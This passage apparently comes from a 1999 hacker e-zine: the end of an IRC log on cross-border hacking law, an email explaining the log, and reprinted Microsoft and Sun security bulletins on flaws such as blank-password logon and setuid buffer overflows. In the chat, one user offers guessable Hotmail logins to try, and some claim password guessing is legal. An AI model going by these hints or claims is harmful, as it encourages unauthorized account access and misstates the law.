(eprom=0F) [04:50] *** Parts: Winn (Winn@1*!*.uu.net) [04:51] maquis: I will mail jou a zone file then :) or give me = the IP of root nameserver :) [04:51] heehe...NOT! [04:51] maquis: ptr would do :) [04:52] ptr? as in comPuTeR? [04:52] ptr record :) [04:52] char *ptr; ? [04:52] uh... know linux? [04:52] *** Joins: Father (Agrosso@170.*!*.att.net) [04:52] Ahhh...leee-nux.... [04:52] * Nikkita tells everyone about DNS howto :) [04:53] << - NT (ack!) person [04:53] ptr as in polish hax0r crew [04:53] Have I missed anything [04:53] like jurassic park "Eye Know Yooooooo neeekz" [04:53] Where is Winn? [04:53] he left [04:53] winn, going to sleep [04:54] Farther: In the Netherlands is privacy exposed trough a software bug not punished, [04:54] wrapping it up right now father [04:54] I'm heading off, all. Thanks for the invites, keep yer heads down, chins up, and.... [04:54] ...lets be careful out there. [04:54] If I use an in America located router to connect to a server in The Netherlands, and USE a bug [04:54] Night all...rick.... [04:54] could I be convicted in America? [04:54] *** Quits: maquis (Leaving=0F) [04:55] it's indirect, data still was used from america to perfor= m the action... he mentioned indirect before [04:55] I'm not clear on the question [04:55] delam: I'm stationed in the Netherlands. [04:56] so american property was involved in a crime? [04:56] Could I be convicted cause I used in USA stationed equipment. [04:56] delam: nope, just the connection [04:56] What does "in USA stationed equipment"? [04:56] it has IP traffic, which I use [04:57] delam: typing cisco as a password in a Cisco router isn= 't hacking... [04:57] heh, there's alot of definintions to hacking, I agree [04:58] *** Quits: lothos (g'night=0F) [04:58] heh, it might not be hacking, but it is truly sad how often it works [04:59] Father: a router is located fysical in USA, I connect t= o that, en then will from ther connect to a server in the Netherlands, [04:59] that's the state of the world with technology [04:59] Bottom line: (1) authorized access; (2) on computer connected to Interent; (3) where there is "some" connection to U.S. or Inernational seas, air, shops, or the like, equals prosecutable crime in US., even you and computer(s) never step foot on US soil. Gabish? Broad statute. [04:59] Nikkita: Yep. You got warrant. [04:59] father: but I don't do a crime in the Netherlands.. [04:59] authorized access is the key to this issue.. if authorize= d isn't stated and you guess a password and get in.. have you committed a crime? I'd say no [05:00] delam: I say no ... [05:00] So? Its not Netherlands statute. Its US statute. [05:00] Delam: Guessing password and using it is unauthorized access. [05:00] Try this for an example at Hotmail... [05:00] user: john2 [05:00] pass: john [05:00] user: hank2 [05:00] pass: hank [05:01] No thanks. [05:01] father, what about statute interpreation, that without warning banner, there is no unauthorized entry, all entry is fine [05:01] just by guessing... [05:01] the problem with internet protocols are taht certain TCP/= IP ports do not have the ability built into the protocol to post a banner.. therefore, the issue of "authorized" can never be established by the pers= on running the computer [05:02] Feur: Wrong. That warning banner issue has to do with whether the US government can monitor you without a warrant. [05:02] or "rights without remedy" [05:02] if there is a banner on port 23 taht says "you must work here to enter" and a hacker finds port 21 with no banner and enters, even while guessing a passowrd, have they committed a crime?/ the couldn't see any sign that said "keep out" [05:02] feur: in Scandinavian countries they MUST have fysical saying that you may not enter whitout authoring. [05:03] Sign that says keep out is not imortatnt. Sign that say= s come on in is. [05:03] sorry [05:03] (Hey, feds are tough.)_ [05:03] how do you establish "authorized access" when a computer = has been connected to a public network without any signs?? I'd say that impli= es it's meant for the public [05:04] interesting you say that father, my partner is a crimianl attorney in boston, and is defending an elctronic perimeter intrusion [05:04] Depends on what the purpose of it being connected is. [05:04] delam: just like sending mail to another country, that packets will travell along dosen systems without asking for permission [05:04] you're posed with the problem taht you cannot from the outside determine what it's purpose is, but your intent is to enter [05:05] Who is your partner? [05:05] partner? [05:06] Fleur: who is your partner? [05:06] Savage? Silverglate? [05:06] check your message window [05:06] it's an interesting debate that I haven't seen any clear = cut legal answers for [05:07] btw: does anyone know about research in hacks commited = in USA and outside of the USA [05:08] nikkita, check nexus [05:08] I have the feeling that it 's easer to hack in the USA, cause the high penalties companies don't do alot of there securityes [05:08] www.nexus.com? [05:08] or lexus nexus [05:09] the db lex nex [05:09] Time for me to go. Feel free to contact me, agrosso@xxx.org [05:09] good morning :) [05:09] thanks Ftaher [05:09] feur: nexus is a security audit tool like satan [05:09] Father [05:10] no, private db lex [05:10] feur: I'll check on that, just have to find a working account :) [05:13] to all LoU members still here, don't let that affaire helding you of. [05:13] You did fine in the past remember that. [05:13] *** Quits: Father (Ping timeout for Father[170.arlington-04.va.dial-access.att.net]=0F) [05:15] Mark: If your are in Holland in June come and look us u= p [05:15] Dutch scene will have a 3 day during party [05:16] CCC, Rop Gongrijp and maybe some L0pth members [05:16] will be ther [05:18] ok ladies and gentlemen the marat sade is over tonight, please come back to the asylum [05:20] feur: good bye [05:20] sleep tighyt [05:20] *** Quits: Nikkita (Leaving=0F) [05:22] goodnight mofo nikkita [05:24] *** Quits: feur (irc, where is the wizard of OZ=0F) [05:25] I'm going to shut the server down in a couple minutes [05:25] bye all [05:26] *** Quits: dyslexia (Nuke a gay whale for Jesus!=0F) [05:27] *** Disconnected Session Close: Wed Jan 20 05:27:08 1999 -- See Ya! RuffNeck ---- --- -- - ruffneck@xxxxxx.xxx Prior to posting this here I contacted Bronc Buster and he was kind enough to get back to me with some of the inside story on what happened and why.. this is his message with only slight modifications: Delivered-To: dok-cruciphux@dok.org Date: Fri, 12 Feb 1999 15:02:34 -0500 (EST) From: Bronc Buster To: cruciphux cc: contact@hackernews.com Subject: Re: irc log In-Reply-To: <19990212152545.SUKT27696.mail.rdc1.on.home.com@azazel.n0where.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII I thank you for contacting someone and telling us about this. I'll tell you what this log is, and what it is about. The l00zerz over at Infowar decided they wanted to try and get a peace of the LoU story, so they offered to organize a 'secret' meeting with 'professionals' in the security and intelligance world to offer us advice after the China hacks because it was confermed that the Chinese Govt sent out a memo to some internal security group and told them to 'actively' look for me and Zyklon. Because Winn knows that I know he is nothing but a fake, he tried to exclude me and Zyklon from the meeting altogeather. As you can see from the logs it worked. Once I had been told by other LoU members about it I contacted Winn and Betty asking what this was all about. They said it was nothing and was not going to happen and to not be concerned. As you can see they conspired with the rest of LoU to exclude me (maybe Zyklon as well) so that they could have this meeting. What they talked about I had no idea until I saw this log. I was told it never took place. It's funny, me and Zyklon were the people in hot water, and we were the ones not included. It's a case of nothing more then the people at Infowar wanting a peace of a big story and getting their grubby hands into this whole mess. I don't want to say anything negative about LoU, so suffice it to say, I am no longer affiliated with LoU in any way, shape or form. If you want to print any of this in your news letter, or if HNN wants to print any of this you may, with the exception of anything that I may of let slip out about LoU, or any negative comments against LoU. We parted ways, you guys can see the BS that surrounded it.. Again, thanks for contacting me regards,    Bronc Buster 'Nuff said on this story I think... thanks to Bronc Buster for clearing some of this scenario up, and others for advice on 'handling' you know who you are, also Ruffneck for the log. - Ed @HWA 5.0 Microsoft advisories ~~~~~~~~~~~~~~~~~~~~ [] Back office server 4.0 Approved-By: secnotif@MICROSOFT.COM Date: Fri, 12 Feb 1999 12:42:57 -0800 Sender: Microsoft Product Security Notification Service From: Microsoft Product Security Subject: Microsoft Security Bulletin (MS99-005) To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM Microsoft Security Bulletin (MS99-005) -------------------------------------- >BackOffice Server 4.0 Does Not Delete Installation Setup File Originally Posted: February 12, 1999 Summary ======= > Microsoft (R) has learned of a potential vulnerability in the installer for > BackOffice Server (R) 4.0. The installer asks the user to provide the > account userid and password for selected services and writes these to a file > in order to automate the installation process. However, the file is not > deleted when the installation process completes. As detailed below, > Microsoft recommends that BackOffice 4.0 customers delete this file. Microsoft has received no reports of customers being adversely affected by this problem. However, it is releasing this security bulletin in order to proactively provide customers with information about the problem in order to allow them to take steps to ensure their safe computing. Issue ===== When a user chooses to install SQL Server (R), Exchange Server (R) or Microsoft Transaction Server (R) as part of a BackOffice 4.0 installation, the BackOffice installer program requests the name and password for the accounts associated with these services. Specifically, it asks for the account name and password for the SQL Executive Logon account, the Exchange Services Account, and the MTS Remote Administration Account. These values are stored in \Program Files\Microsoft Backoffice\Reboot.ini, and used to install the associated services. BackOffice Server does not erase this file when the installation process is completed. This is true regardless of whether the installation process completes successfully or unsuccessfully. By default, the Microsoft BackOffice folder is not shared, so network access to reboot.ini generally does not pose a risk. Users who can log onto the server locally would be able to access the file, but in most cases this ability is granted only to selected users such as administrators. The fix for this problem is to delete the file \Program Files\Microsoft Backoffice\Reboot.ini after each BackOffice 4.0 installation, whether successful or not. The file is created only by the installer, and, once deleted, will not be re-created unless BackOffice 4.0 is re-installed. Affected Software Versions ========================== The following software versions are affected: - Microsoft BackOffice Server 4.0 What Microsoft is Doing ======================= On February 12th, Microsoft sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service (see http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service). Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q217004,    BackOffice Installer Tool Does Not Delete Password Cache File.    http://support.microsoft.com/support/kb/articles/q217/0/04.asp    (Note: It might take 24 hours from the original posting of this    bulletin for the KB article to be visible in the Web-based    Knowledge Base.) What customers Should Do ======================== Microsoft recommends that customers ensure that they delete the file \Program Files\Microsoft Backoffice\Reboot.ini after the installation program for BackOffice 4.0 completes More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-005,    BackOffice 4.0 Does Not Delete Installation Setup File    (the Web-posted version of this bulletin),    http://www.microsoft.com/security/bulletins/ms99-005.asp. - Microsoft Knowledge Base (KB) article Q217004,    BackOffice Installer Tool Does Not Delete Password Cache File.    http://support.microsoft.com/support/kb/articles/q217/0/04.asp    (Note: It might take 24 hours from the original posting of this    bulletin for the KB article to be visible in the Web-based    Knowledge Base.) Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Revisions ========= - February 12, 1999: Bulletin Created For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security Approved-By: secnotif@MICROSOFT.COM X-Mailer: Internet Mail Service (5.5.2524.0) Date: Mon, 8 Feb 1999 15:06:09 -0800 Sender: Microsoft Product Security Notification Service From: Microsoft Product Security Subject: Microsoft Security Bulletin (MS99-004) To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM Microsoft Security Bulletin (MS99-004) -------------------------------------- Patch Available for Authentication Processing Error in Windows NT (r) 4.0 Service Pack 4 Originally Posted: February 8, 1999 Summary ======= > Microsoft has released a patch that eliminates a logic error in Service Pack > 4 for Windows NT 4.0 that could, under certain conditions, allow a user to > log on interactively and connect to network shares using a blank password. > The vulnerability primarily, but not exclusively, affects Windows NT servers > that serve as domain controllers in environments with DOS, Windows 3.1, > Windows for Workgroups, OS/2 or Macintosh clients. In general, customers who > have deployed only Windows NT, Windows 95 and Windows 98 client workstations > are not at risk from this vulnerability. A fully supported patch is available for this vulnerability, and Microsoft recommends that all customers evaluate the risk to their systems and, as appropriate, download and install it on affected computers. Issue ===== The Windows NT Security Account Manager (SAM) database stores the hashed password for each user account in two forms: an "NT hash" form that is used to authenticate users on Windows NT clients, and an "LM hash" form that is used to authenticate users on Windows 95, Windows 98, and downlevel clients such as DOS, Windows 3.1, Windows for Workgroups, OS/2 and Macintosh. When a user changes his password via a Windows NT, Windows 95 or Windows 98 client, both the "NT hash" and "LM hash" forms of the password are updated in the SAM. However, when the user changes his password via a downlevel client, only the "LM hash" form of the password is stored; a null value is stored in the "NT hash" field. This is normal operation. When a user attempts an interactive logon or a network share connection from a Windows NT system, the Windows NT authentication process uses the "NT hash" form of the password. If the "NT hash" is null, the "LM hash" of the password is used for verification. (Windows 95, Windows 98 and downlevel clients always use only the "LM hash" for verification.) The logic error in Service Pack 4 incorrectly allows a null "NT hash" value to be used for authentication from Windows NT systems. The result is that if a user account's password was last changed from a DOS, Windows 3.1, Windows for Workgroups, OS/2 or Macintosh client, a user can logon into that account from a Windows NT system using a blank password. By far the most likely machines to be affected by this vulnerability would be domain controllers running Windows NT 4.0 SP 4, in networks that contain any of the downlevel clients listed above. However, any server or workstation running Windows NT 4.0 SP 4 that contains a SAM database with active users who communicate from downlevel clients would be vulnerable to this problem. For example, a workgroup of Windows NT 4.0 SP 4 systems, one of which is accessed by Windows for Workgroups clients, would be affected by this vulnerability. It is worth reiterating the following points: - Even on an affected network, a user whose most recent    password change was performed via Windows NT, Windows 95    or Windows 98 workstations will have a non-null "NT hash"    value, and hence will not be at risk. - Customers who are affected by the vulnerability need only    apply the patch to machines that contain SAM databases    with active user accounts. - There is no need for users to update or change their passwords    after applying the patch. Even in vulnerable systems, the SAM    database entries are valid; the problem lies in the way SP4    processes them. The patch corrects the authentication process    logic in SP4 without changing the SAM database entries in any way. Affected Software Versions ========================== The following software versions are affected: - Microsoft Windows NT 4.0, Service Pack 4 What Microsoft is Doing ======================= On February 8th, Microsoft released a patch that fixes the problem identified above. This patch is available for download from the sites listed below. Microsoft has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service (see http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service). Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q214840,    MSV1_0 Incorrectly Allows Network Connections for Specific Accounts    http://support.microsoft.com/support/kb/articles/q214/8/40.asp    (Note: It might take 24 hours from the original posting of this    bulletin for the KB article to be visible in the Web-based    Knowledge Base.) Microsoft has posted the following hot fixes to address this problem. Please note that the URLs below have been word-wrapped for readability. - Fix for x86 version:    ftp://ftp.microsoft.com/bussys/winnt/winnt-public    /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixi.exe - Fix for Alpha version:    ftp://ftp.microsoft.com/bussys/winnt/winnt-public    /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixa.exe What Customers Should Do ======================== The patch for this vulnerability is fully supported, and Microsoft recommends that all affected customers apply it. The URLs for the patch are provided above in What Microsoft is Doing. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-004,    Patch Available for Authentication Processing    Error in Windows NT 4.0 Service Pack 4 (the    Web-posted version of this bulletin),    http://www.microsoft.com/security/bulletins/ms99-004.asp. - Microsoft Knowledge Base (KB) article Q214840,    MSV1_0 Incorrectly Allows Network Connections for    Specific Accounts.    http://support.microsoft.com/support/kb/articles/q214/8/40.asp    (Note: It might take 24 hours from the original posting    of this bulletin for the KB article to be visible in the    Web-based Knowledge Base.) Acknowledgements ================ Microsoft wishes to acknowledge Harry Johnston, School of Computing and Mathematical Sciences, University of Waikato, New Zealand, for discovering this vulnerability and reporting it to us. Obtaining Support on this Issue =============================== This is a supported patch. If you have problems installing this patch or require technical assistance with this patch, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Revisions ========= - February 8, 1999: Bulletin Created For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security ----------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.    ******************************************************************* You have received  this e-mail bulletin as a result  of your registration to  the   Microsoft  Product  Security  Notification   Service.  You  may unsubscribe from this e-mail notification  service at any time by sending an  e-mail  to  MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For  more  information on  the  Microsoft  Security Notification  Service please    visit    http://www.microsoft.com/security/bulletin.htm.    For security-related information  about Microsoft products, please  visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 5.1 Sun security advisories ~~~~~~~~~~~~~~~~~~~~~~~ { Sorry but the excess crap has been left in these advisories to keep the legal people happy. - Ed } Date: Wed, 10 Feb 1999 11:24:01 -0800 From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team) Message-Id: <199902101924.LAA25198@sunsc.eng.sun.com> To: CWS@sunsc.Eng.Sun.COM X-Sun-Charset: US-ASCII Subject: Sun Security Bulletin #00183 -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________    Sun Microsystems, Inc. Security Bulletin Bulletin Number: #00183 Date: February 10, 1999 Cross-Ref: Title: sdtcm_convert ________________________________________________________________________________ The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction. ________________________________________________________________________________ 1.  Background     sdtcm_convert is a setuid-root calendar data conversion utility which     converts version 3 (OpenWindows) calendar data format to version 4     (extensible calendar data format), and vice versa. A buffer overflow     has been discovered which may be exploited to gain root access.  2.  Affected Supported Versions             Solaris(tm) versions:   7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,                             2.5_x86, 2.4 and 2.4_x86 running CDE                    3.  Recommendations     Sun recommends that you install the respective patches immediately     on affected systems.         CDE Version Patch ID            ___________ _________     1.3                 107022-01     1.3_x86             107023-01     1.2                 105566-06     1.2_x86             105567-07     1.0.2               103670-06     1.0.2_x86           103717-06     1.0.1               103671-06     1.0.1_x86           103718-06 _______________________________________________________________________________ APPENDICES A.  Patches listed in this bulletin are available to all Sun customers via     World Wide Web at:         B.  Checksums for the patches listed in this bulletin are available via     World Wide Web at:     C.  Sun security bulletins are available via World Wide Web at: D.  Sun Security Coordination Team's PGP key is available via World Wide Web     at:             E.  To report or inquire about a security problem with Sun software, contact     one or more of the following:           - Your local Sun answer centers         - Your representative computer security response team, such as CERT         - Sun Security Coordination Team. Send email to:      security-alert@sun.com F.  To receive information or subscribe to our CWS (Customer Warning System)     mailing list, send email to:         security-alert@sun.com        with a subject line (not body) containing one of the following commands:         Command         Information Returned/Action Taken         _______         _________________________________         help            An explanation of how to get information                 key             Sun Security Coordination Team's PGP key         list            A list of current security topics         query [topic]   The email is treated as an inquiry and is forwarded to                         the Security Coordination Team         report [topic]  The email is treated as a security report and is                         forwarded to the Security Coordination Team. Please                         encrypt sensitive mail using Sun Security Coordination                         Team's PGP key         send topic      A short status summary or bulletin. For example, to                         retrieve a Security Bulletin #00138, supply the                         following in the subject line (not body):                                         send #138         subscribe       Sender is added to our mailing list.  To subscribe,                         supply the following in the subject line (not body):                             subscribe cws your-email-address                         Note that your-email-address should be substituted                         by your email address.         unsubscribe     Sender is removed from the CWS mailing list. ________________________________________________________________________________ Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNsDNl7dzzzOFBFjJAQHCzAQAgcHETSfA5CrYudnSZues30KRififcbhB FIKBKhAh/Tec7pa0sg9nvTjGPTcTpMPPyj2asxM9KXsxLTKILt8EuoLy3QWdc+qr Tu0pVIcQ/PIBaUXpGMvABS1tVf13tWUIcvZ6yaj08cELV4O6X7K8dbbEXXGfLPtK fSyVXp5ktPo= =B8vf -----END PGP SIGNATURE----- Date: Wed, 10 Feb 1999 12:01:07 -0800 From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team) Message-Id: <199902102001.MAA25280@sunsc.eng.sun.com> To: CWS@sunsc.Eng.Sun.COM Subject: Sun Security Bulletin #00184 X-Sun-Charset: US-ASCII -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________    Sun Microsystems, Inc. Security Bulletin Bulletin Number: #00184 Date: February 10, 1999 Cross-Ref: Title: man/catman ________________________________________________________________________________ The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction. ________________________________________________________________________________ 1.  Background     The man command displays information from the reference manuals. The     catman utility creates preformatted versions of the on-line manuals.     Vulnerabilities have been discovered with these commands that may be     exploited to overwrite arbitrary files when man or catman is executed     by root.     2.  Affected Supported Versions             Solaris(tm) versions:   7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,                             2.5_x86, 2.4, 2.4_x86, and 2.3                                 SunOS(tm) versions:     4.1.4 and 4.1.3_U1                    3.  Recommendations     Sun recommends that you install the respective patches immediately     on affected systems.         Operating System Patch ID     _________________   _________        Solaris 7           107038-01     Solaris 7_x86       107039-01     Solaris 2.6         106123-04     Solaris 2.6_x86     106124-04     Solaris 2.5.1       106905-01     Solaris 2.5.1_x86   106906-01     Solaris 2.5         106907-01     Solaris 2.5_x86     106908-01     Solaris 2.4         106912-01     Solaris 2.4_x86     106962-01     Solaris 2.3         106911-01     SunOS   4.1.4 107157-01                         107144-01     SunOS   4.1.3_U1 107156-01                         107143-01                         _______________________________________________________________________________ APPENDICES A.  Patches listed in this bulletin are available to all Sun customers via     World Wide Web at:         B.  Checksums for the patches listed in this bulletin are available via     World Wide Web at:     C.  Sun security bulletins are available via World Wide Web at: D.  Sun Security Coordination Team's PGP key is available via World Wide Web     at:             E.  To report or inquire about a security problem with Sun software, contact     one or more of the following:           - Your local Sun answer centers         - Your representative computer security response team, such as CERT         - Sun Security Coordination Team. Send email to:      security-alert@sun.com F.  To receive information or subscribe to our CWS (Customer Warning System)     mailing list, send email to:         security-alert@sun.com        with a subject line (not body) containing one of the following commands:         Command         Information Returned/Action Taken         _______         _________________________________         help            An explanation of how to get information                 key             Sun Security Coordination Team's PGP key         list            A list of current security topics         query [topic]   The email is treated as an inquiry and is forwarded to                         the Security Coordination Team         report [topic]  The email is treated as a security report and is                         forwarded to the Security Coordination Team. Please                         encrypt sensitive mail using Sun Security Coordination                         Team's PGP key         send topic      A short status summary or bulletin. For example, to                         retrieve a Security Bulletin #00138, supply the                         following in the subject line (not body):                                         send #138         subscribe       Sender is added to our mailing list.  To subscribe,                         supply the following in the subject line (not body):                             subscribe cws your-email-address                         Note that your-email-address should be substituted                         by your email address.         unsubscribe     Sender is removed from the CWS mailing list. ________________________________________________________________________________ Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNsDNq7dzzzOFBFjJAQEW2AQAhwzM5IgjrTmjzxu9NbheZ8cGH2xtiLId At89187MXvjXuTw44HUiulBQtJoKYdhf9yiU+n0BtUAUpRsXMtu/mtOkwajMAzRi lZ+Js93s1x3o6GY8qy+jbl4m7zLLrzRx6V+T+DwjWFVZ5RfW+57MEgEx3kTgCEzt c+KlX2EGnP0= =XsT5 -----END PGP SIGNATURE----- Date: Wed, 10 Feb 1999 12:01:34 -0800 From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team) Message-Id: <199902102001.MAA25297@sunsc.eng.sun.com> To: CWS@sunsc.Eng.Sun.COM Subject: Sun Security Bulletin #00185 X-Sun-Charset: US-ASCII -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________    Sun Microsystems, Inc. Security Bulletin Bulletin Number: #00185 Date: February 10, 1999 Cross-Ref: CERT CA-98.02 Title: Common Desktop Environment (CDE) ________________________________________________________________________________ The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction. ________________________________________________________________________________ 1.  Background     Several vulnerabilities in the Common Desktop Environment (CDE) may be     be exploited to gain root access and remove arbitrary files. 2.  Affected Supported Versions             Solaris(tm) versions:   2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,                             2.5_x86, 2.4 and 2.4_x86 running CDE                                 Solaris 7 is not affected.                                 3.  Recommendations     Sun recommends that you install the respective patches immediately     on affected systems.         CDE Version         Patch ID            ___________         _________     1.2 106112-03     105837-02     1.2_x86 106113-03         105838-02     1.0.2 104661-07     104498-05     103882-09     1.0.2_x86 104663-08       104500-05       103886-08     1.0.1 104660-04     104497-05     103884-07     1.0.1_x86 104662-05     104499-05     103885-07       _______________________________________________________________________________ APPENDICES A.  Patches listed in this bulletin are available to all Sun customers via     World Wide Web at:         B.  Checksums for the patches listed in this bulletin are available via     World Wide Web at:     C.  Sun security bulletins are available via World Wide Web at: D.  Sun Security Coordination Team's PGP key is available via World Wide Web     at:             E.  To report or inquire about a security problem with Sun software, contact     one or more of the following:           - Your local Sun answer centers         - Your representative computer security response team, such as CERT         - Sun Security Coordination Team. Send email to:      security-alert@sun.com F.  To receive information or subscribe to our CWS (Customer Warning System)     mailing list, send email to:         security-alert@sun.com        with a subject line (not body) containing one of the following commands:         Command         Information Returned/Action Taken         _______         _________________________________         help            An explanation of how to get information                 key             Sun Security Coordination Team's PGP key         list            A list of current security topics         query [topic]   The email is treated as an inquiry and is forwarded to                         the Security Coordination Team         report [topic]  The email is treated as a security report and is                         forwarded to the Security Coordination Team. Please                         encrypt sensitive mail using Sun Security Coordination                         Team's PGP key         send topic      A short status summary or bulletin. For example, to                         retrieve a Security Bulletin #00138, supply the                         following in the subject line (not body):                                         send #138         subscribe       Sender is added to our mailing list.  To subscribe,                         supply the following in the subject line (not body):                             subscribe cws your-email-address                         Note that your-email-address should be substituted                         by your email address.         unsubscribe     Sender is removed from the CWS mailing list. ________________________________________________________________________________ Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 